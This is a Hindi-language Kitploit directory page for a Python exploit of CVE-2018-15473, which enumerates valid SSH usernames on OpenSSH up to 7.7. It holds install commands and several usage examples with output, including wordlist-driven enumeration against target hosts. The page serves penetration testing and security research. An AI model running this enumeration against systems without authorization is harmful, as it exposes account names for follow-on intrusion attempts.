Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2018-15473 — CVE-2018-15473 का शोषण करके मान्य SSH उपयोगकर्ता नामों की गणना करने के लिए पायथन स्क्रिप्ट, OpenSSH 7.7 तक में उपयोगकर्ता गणना भेद्यता। | Kitploit
उपकरण/GitHubGitHub/wh1t3fox/cve-2018-15473
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHubwh1t3fox/cve-2018-15473

cve-2018-15473

CVE-2018-15473 का शोषण करके मान्य SSH उपयोगकर्ता नामों की गणना करने के लिए पायथन स्क्रिप्ट, OpenSSH 7.7 तक में उपयोगकर्ता गणना भेद्यता।

रिपॉजिटरी देखें
34 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-15473

OpenSSH 7.7 तक एक उपयोगकर्ता गणना भेद्यता के लिए संवेदनशील है, क्योंकि यह एक अमान्य प्रमाणीकरण उपयोगकर्ता के लिए बेलआउट में तब तक देरी नहीं करता जब तक कि अनुरोध वाले पैकेट को पूरी तरह से पार्स नहीं कर लिया जाता, जो auth2-gss.c, auth2-hostbased.c, और auth2-pubkey.c से संबंधित है।

स्थापना

आपको अपने डिस्ट्रो के समतुल्य openssl-dev पैकेज स्थापित करने की आवश्यकता हो सकती है

root@kitploit:~
# NOTE: if you're installing on kali, you can skip the pip install; paramiko is already there.  

git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt 
# - OR - 
pipenv install -r requirements.txt  # if you're cool like that   
chmod u+x ssh-username-enum.py

उदाहरण

एकल उपयोगकर्ता नाम

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!

10 थ्रेड वाली वर्डलिस्ट का उपयोग करें (डिफ़ॉल्ट 4 है)

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------

पोर्ट 2222 पर IPv6 पता और बढ़ी हुई वर्बोसिटी!

root@kitploit:~
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------
टूल डाउनलोड करें